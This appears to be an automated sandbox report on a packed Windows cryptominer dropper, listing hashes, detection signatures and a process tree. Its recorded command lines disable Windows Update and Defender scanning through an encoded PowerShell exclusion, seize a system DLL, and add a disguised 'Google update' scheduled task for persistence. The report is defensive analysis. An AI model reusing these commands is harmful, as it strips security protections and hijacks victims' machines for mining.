Analysis
-
max time kernel
300s -
max time network
309s -
platform
windows7_x64 -
resource
win7-20220718-en -
resource tags
arch:x64arch:x86image:win7-20220718-enlocale:en-usos:windows7-x64system -
submitted
09-08-2022 22:18
Behavioral task
behavioral1
Sample
b36f1aba7155ea371ae7bdaeef70f14c46040ec00a9a7dccad4e607852e13b4c.exe
Resource
win7-20220718-en
General
-
Target
b36f1aba7155ea371ae7bdaeef70f14c46040ec00a9a7dccad4e607852e13b4c.exe
-
Size
7.3MB
-
MD5
df35dd9a6f211651c51e99928eb21cf1
-
SHA1
84b644f6e404c0c6eac3af7768d7d44c01dbd9bb
-
SHA256
b36f1aba7155ea371ae7bdaeef70f14c46040ec00a9a7dccad4e607852e13b4c
-
SHA512
b6a21f19adc1a302677da6f1c8f7bcc6222b5d2edd4fb12f21c1c12a1d55aa93c8586ce25827f8c9f45d51003b5b2db106949c7791d98d9b474a10a99dcca1d6
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes:
b36f1aba7155ea371ae7bdaeef70f14c46040ec00a9a7dccad4e607852e13b4c.exeupdater.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b36f1aba7155ea371ae7bdaeef70f14c46040ec00a9a7dccad4e607852e13b4c.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ updater.exe -
XMRig Miner payload 13 IoCs
Processes:
resource yara_rule behavioral1/memory/1992-162-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1992-164-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1992-166-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1992-167-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1992-168-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1992-170-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1992-172-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1992-173-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1992-174-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1992-176-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1992-178-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1992-180-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1992-181-0x0000000140000000-0x0000000140809000-memory.dmp xmrig -
Drops file in Drivers directory 2 IoCs
Processes:
conhost.execonhost.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe -
Executes dropped EXE 1 IoCs
Processes:
updater.exepid process 900 updater.exe -
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 928 takeown.exe 1428 icacls.exe 1164 takeown.exe 1560 icacls.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
b36f1aba7155ea371ae7bdaeef70f14c46040ec00a9a7dccad4e607852e13b4c.exeupdater.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b36f1aba7155ea371ae7bdaeef70f14c46040ec00a9a7dccad4e607852e13b4c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b36f1aba7155ea371ae7bdaeef70f14c46040ec00a9a7dccad4e607852e13b4c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion updater.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion updater.exe -
Loads dropped DLL 1 IoCs
Processes:
taskeng.exepid process 360 taskeng.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
icacls.exetakeown.exeicacls.exetakeown.exepid process 1428 icacls.exe 1164 takeown.exe 1560 icacls.exe 928 takeown.exe -
Processes:
resource yara_rule behavioral1/memory/1948-54-0x0000000000400000-0x00000000010C1000-memory.dmp themida behavioral1/memory/1948-55-0x0000000000400000-0x00000000010C1000-memory.dmp themida behavioral1/memory/1948-57-0x0000000000400000-0x00000000010C1000-memory.dmp themida behavioral1/memory/1948-59-0x0000000000400000-0x00000000010C1000-memory.dmp themida \Program Files\Google\Chrome\updater.exe themida C:\Program Files\Google\Chrome\updater.exe themida behavioral1/memory/900-95-0x0000000000400000-0x00000000010C1000-memory.dmp themida behavioral1/memory/900-97-0x0000000000400000-0x00000000010C1000-memory.dmp themida behavioral1/memory/900-110-0x0000000000400000-0x00000000010C1000-memory.dmp themida behavioral1/memory/900-112-0x0000000000400000-0x00000000010C1000-memory.dmp themida C:\Program Files\Google\Chrome\updater.exe themida -
Processes:
b36f1aba7155ea371ae7bdaeef70f14c46040ec00a9a7dccad4e607852e13b4c.exeupdater.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA b36f1aba7155ea371ae7bdaeef70f14c46040ec00a9a7dccad4e607852e13b4c.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA updater.exe -
Drops file in System32 directory 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
b36f1aba7155ea371ae7bdaeef70f14c46040ec00a9a7dccad4e607852e13b4c.exeupdater.exepid process 1948 b36f1aba7155ea371ae7bdaeef70f14c46040ec00a9a7dccad4e607852e13b4c.exe 900 updater.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
conhost.exedescription pid process target process PID 816 set thread context of 1992 816 conhost.exe explorer.exe -
Drops file in Program Files directory 3 IoCs
Processes:
conhost.execonhost.exedescription ioc process File created C:\Program Files\Google\Chrome\updater.exe conhost.exe File opened for modification C:\Program Files\Google\Chrome\updater.exe conhost.exe File created C:\Program Files\Google\Libs\WR64.sys conhost.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 1940 sc.exe 1356 sc.exe 1968 sc.exe 1540 sc.exe 2040 sc.exe 1800 sc.exe 696 sc.exe 696 sc.exe 1604 sc.exe 1360 sc.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 5 IoCs
Processes:
powershell.execonhost.exedescription ioc process Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 609118024facd801 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ conhost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" conhost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" conhost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe -
Modifies registry key 1 TTPs 18 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 1140 reg.exe 1264 reg.exe 628 reg.exe 1648 reg.exe 1168 reg.exe 1188 reg.exe 1268 reg.exe 1960 reg.exe 1676 reg.exe 1332 reg.exe 696 reg.exe 1804 reg.exe 972 reg.exe 1904 reg.exe 832 reg.exe 1164 reg.exe 1800 reg.exe 2040 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.execonhost.exepowershell.execonhost.exeexplorer.exepid process 2012 powershell.exe 240 conhost.exe 112 powershell.exe 816 conhost.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe 1992 explorer.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 464 -
Suspicious use of AdjustPrivilegeToken 15 IoCs
Processes:
powershell.exepowercfg.exepowercfg.exepowercfg.execonhost.exepowercfg.exetakeown.exepowershell.execonhost.exetakeown.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exeexplorer.exedescription pid process Token: SeDebugPrivilege 2012 powershell.exe Token: SeShutdownPrivilege 1064 powercfg.exe Token: SeShutdownPrivilege 1264 powercfg.exe Token: SeShutdownPrivilege 1664 powercfg.exe Token: SeDebugPrivilege 240 conhost.exe Token: SeShutdownPrivilege 548 powercfg.exe Token: SeTakeOwnershipPrivilege 928 takeown.exe Token: SeDebugPrivilege 112 powershell.exe Token: SeDebugPrivilege 816 conhost.exe Token: SeTakeOwnershipPrivilege 1164 takeown.exe Token: SeShutdownPrivilege 1696 powercfg.exe Token: SeShutdownPrivilege 1608 powercfg.exe Token: SeShutdownPrivilege 320 powercfg.exe Token: SeShutdownPrivilege 900 powercfg.exe Token: SeLockMemoryPrivilege 1992 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
b36f1aba7155ea371ae7bdaeef70f14c46040ec00a9a7dccad4e607852e13b4c.execonhost.execmd.execmd.exedescription pid process target process PID 1948 wrote to memory of 240 1948 b36f1aba7155ea371ae7bdaeef70f14c46040ec00a9a7dccad4e607852e13b4c.exe conhost.exe PID 1948 wrote to memory of 240 1948 b36f1aba7155ea371ae7bdaeef70f14c46040ec00a9a7dccad4e607852e13b4c.exe conhost.exe PID 1948 wrote to memory of 240 1948 b36f1aba7155ea371ae7bdaeef70f14c46040ec00a9a7dccad4e607852e13b4c.exe conhost.exe PID 1948 wrote to memory of 240 1948 b36f1aba7155ea371ae7bdaeef70f14c46040ec00a9a7dccad4e607852e13b4c.exe conhost.exe PID 240 wrote to memory of 2012 240 conhost.exe powershell.exe PID 240 wrote to memory of 2012 240 conhost.exe powershell.exe PID 240 wrote to memory of 2012 240 conhost.exe powershell.exe PID 240 wrote to memory of 1216 240 conhost.exe cmd.exe PID 240 wrote to memory of 1216 240 conhost.exe cmd.exe PID 240 wrote to memory of 1216 240 conhost.exe cmd.exe PID 240 wrote to memory of 1936 240 conhost.exe cmd.exe PID 240 wrote to memory of 1936 240 conhost.exe cmd.exe PID 240 wrote to memory of 1936 240 conhost.exe cmd.exe PID 1216 wrote to memory of 1360 1216 cmd.exe sc.exe PID 1216 wrote to memory of 1360 1216 cmd.exe sc.exe PID 1216 wrote to memory of 1360 1216 cmd.exe sc.exe PID 1936 wrote to memory of 1064 1936 cmd.exe powercfg.exe PID 1936 wrote to memory of 1064 1936 cmd.exe powercfg.exe PID 1936 wrote to memory of 1064 1936 cmd.exe powercfg.exe PID 1216 wrote to memory of 696 1216 cmd.exe reg.exe PID 1216 wrote to memory of 696 1216 cmd.exe reg.exe PID 1216 wrote to memory of 696 1216 cmd.exe reg.exe PID 1216 wrote to memory of 1356 1216 cmd.exe sc.exe PID 1216 wrote to memory of 1356 1216 cmd.exe sc.exe PID 1216 wrote to memory of 1356 1216 cmd.exe sc.exe PID 1936 wrote to memory of 1264 1936 cmd.exe powercfg.exe PID 1936 wrote to memory of 1264 1936 cmd.exe powercfg.exe PID 1936 wrote to memory of 1264 1936 cmd.exe powercfg.exe PID 1216 wrote to memory of 1604 1216 cmd.exe sc.exe PID 1216 wrote to memory of 1604 1216 cmd.exe sc.exe PID 1216 wrote to memory of 1604 1216 cmd.exe sc.exe PID 1216 wrote to memory of 1940 1216 cmd.exe sc.exe PID 1216 wrote to memory of 1940 1216 cmd.exe sc.exe PID 1216 wrote to memory of 1940 1216 cmd.exe sc.exe PID 1936 wrote to memory of 1664 1936 cmd.exe powercfg.exe PID 1936 wrote to memory of 1664 1936 cmd.exe powercfg.exe PID 1936 wrote to memory of 1664 1936 cmd.exe powercfg.exe PID 1216 wrote to memory of 1164 1216 cmd.exe reg.exe PID 1216 wrote to memory of 1164 1216 cmd.exe reg.exe PID 1216 wrote to memory of 1164 1216 cmd.exe reg.exe PID 1216 wrote to memory of 1140 1216 cmd.exe schtasks.exe PID 1216 wrote to memory of 1140 1216 cmd.exe schtasks.exe PID 1216 wrote to memory of 1140 1216 cmd.exe schtasks.exe PID 1936 wrote to memory of 548 1936 cmd.exe powercfg.exe PID 1936 wrote to memory of 548 1936 cmd.exe powercfg.exe PID 1936 wrote to memory of 548 1936 cmd.exe powercfg.exe PID 1216 wrote to memory of 1676 1216 cmd.exe reg.exe PID 1216 wrote to memory of 1676 1216 cmd.exe reg.exe PID 1216 wrote to memory of 1676 1216 cmd.exe reg.exe PID 1216 wrote to memory of 1648 1216 cmd.exe reg.exe PID 1216 wrote to memory of 1648 1216 cmd.exe reg.exe PID 1216 wrote to memory of 1648 1216 cmd.exe reg.exe PID 1216 wrote to memory of 832 1216 cmd.exe reg.exe PID 1216 wrote to memory of 832 1216 cmd.exe reg.exe PID 1216 wrote to memory of 832 1216 cmd.exe reg.exe PID 1216 wrote to memory of 928 1216 cmd.exe takeown.exe PID 1216 wrote to memory of 928 1216 cmd.exe takeown.exe PID 1216 wrote to memory of 928 1216 cmd.exe takeown.exe PID 1216 wrote to memory of 1428 1216 cmd.exe icacls.exe PID 1216 wrote to memory of 1428 1216 cmd.exe icacls.exe PID 1216 wrote to memory of 1428 1216 cmd.exe icacls.exe PID 240 wrote to memory of 1612 240 conhost.exe cmd.exe PID 240 wrote to memory of 1612 240 conhost.exe cmd.exe PID 240 wrote to memory of 1612 240 conhost.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\b36f1aba7155ea371ae7bdaeef70f14c46040ec00a9a7dccad4e607852e13b4c.exe"C:\Users\Admin\AppData\Local\Temp\b36f1aba7155ea371ae7bdaeef70f14c46040ec00a9a7dccad4e607852e13b4c.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:1948 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\b36f1aba7155ea371ae7bdaeef70f14c46040ec00a9a7dccad4e607852e13b4c.exe"2⤵
- Drops file in Drivers directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:240 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAcgB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbABuAGMAdgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBuAHIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwB1ACMAPgA="3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2012 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
- Suspicious use of WriteProcessMemory
PID:1936 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:1064 -
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:1664 -
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:548 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:1264 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
PID:1216 -
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
PID:1360 -
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:696 -
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
PID:1940 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
PID:1140 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
PID:1648 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
PID:832 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
PID:1676 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:928 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
PID:1164 -
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1428 -
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
PID:1604 -
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
PID:1356 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
PID:1800 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
PID:2040 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
PID:1332 -
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵PID:1640
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵PID:1804
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
PID:696 -
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵PID:1036
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵PID:820
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵PID:1892
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵PID:1000
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵PID:1140
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""3⤵PID:1612
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""4⤵
- Creates scheduled task(s)
PID:2028 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"3⤵PID:1736
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "GoogleUpdateTaskMachineQC"4⤵PID:1992
-
C:\Windows\system32\taskeng.exetaskeng.exe {5490E1C8-3583-4790-8D61-09DEE4952984} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
PID:360 -
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:900 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Program Files\Google\Chrome\updater.exe"3⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:816 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAcgB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbABuAGMAdgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBuAHIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwB1ACMAPgA="4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:112 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵PID:1888
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
- Launches sc.exe
PID:1968 -
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
- Launches sc.exe
PID:1540 -
C:\Windows\system32\sc.exesc stop wuauserv5⤵
- Launches sc.exe
PID:2040 -
C:\Windows\system32\sc.exesc stop bits5⤵
- Launches sc.exe
PID:1800 -
C:\Windows\system32\sc.exesc stop dosvc5⤵
- Launches sc.exe
PID:696 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f5⤵
- Modifies registry key
PID:1804 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f5⤵
- Modifies registry key
PID:1168 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f5⤵
- Modifies registry key
PID:972 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f5⤵
- Modifies registry key
PID:1268 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f5⤵
- Modifies registry key
PID:1264 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1164 -
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q5⤵
- Possible privilege escalation attempt
